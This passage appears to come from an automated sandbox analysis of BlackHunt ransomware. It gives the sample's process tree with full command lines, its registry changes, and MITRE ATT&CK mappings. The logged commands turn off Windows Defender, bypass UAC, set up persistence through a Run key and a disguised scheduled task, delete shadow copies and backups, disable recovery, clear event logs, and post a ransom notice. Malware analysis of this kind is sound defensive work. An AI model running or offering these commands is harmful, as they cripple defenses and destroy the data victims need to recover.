3040 wrote to memory of 2804 3040 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe 48 PID 3040 wrote to memory of 2804 3040 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe 48 PID 3040 wrote to memory of 2768 3040 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe 49 PID 3040 wrote to memory of 2768 3040 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe 49 PID 3040 wrote to memory of 2768 3040 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe 49 PID 3040 wrote to memory of 2768 3040 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe 49 PID 3040 wrote to memory of 2660 3040 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe 50 PID 3040 wrote to memory of 2660 3040 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe 50 PID 3040 wrote to memory of 2660 3040 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe 50 PID 3040 wrote to memory of 2660 3040 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe 50 PID 3040 wrote to memory of 2820 3040 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe 53 PID 3040 wrote to memory of 2820 3040 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe 53 PID 3040 wrote to memory of 2820 3040 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe 53 PID 3040 wrote to memory of 2820 3040 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe 53 PID 3040 wrote to memory of 2708 3040 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe 54 PID 3040 wrote to memory of 2708 3040 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe 54 PID 3040 wrote to memory of 2708 3040 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe 54 PID 3040 wrote to memory of 2708 3040 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe 54 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe"C:\Users\Admin\AppData\Local\Temp\1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:3040 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵PID:2664
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:3008
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:2312
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:1176
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵PID:2152
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:848
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:2676
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:1420
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵PID:2796
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:2280
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:2836
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:644
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:2728
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2136
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:2696
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:2328
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:2704
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:2780
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:2988
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:1516
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:2732
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:1828
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:2804
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:844
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:2768
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:1964
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:2660
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:2672
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:2820
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:1916
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:2708
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:2940
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:2744
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:2992
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2844
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:568
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:2568
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:2016
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2636
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:1764
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:2648
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:1992
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:1088
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:2840
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:2616
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:1760
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:2516
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:888
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:1200
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:2328
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:584
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:1912
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:552
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:1948
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:368
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:2736
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:1468
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:2796
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe" /F2⤵PID:2172
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe" /F3⤵
- Creates scheduled task(s)
PID:2900
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:2488
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1092
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:960
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2360
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:1996
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:1360
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:2492
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:2088
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:1636
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:2092
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:2420
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:2720
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:2528
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:1472
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:1752
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:2576
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:2760
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:1548
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:1668
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:684
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:1588
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:960
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:2500
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:528
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:2352
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:2416
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:2624
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:532
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:2988
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2372
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:2364
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1712
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:1964
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2708
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:2280
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:236
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:2976
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:684
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:2112
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:616
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:708
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:1632
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:1924
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:1780
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:2016
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:2636
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:1652
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:2816
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:2968
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:1908
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:2584
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:240
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:1388
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:1896
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:2760
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:2440
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:1756
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:1208
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:2792
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:952
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:1620
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:2756
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵PID:2752
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta"3⤵
- Modifies Internet Explorer settings
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2892
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\1ba77f96396468b6dcdef50ebd281c089759b06e9e4fb8c32b2c542c9491b81c.exe"2⤵
- Deletes itself
PID:1080 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:968
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:984
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1596
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:2608
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:1752
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
6Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
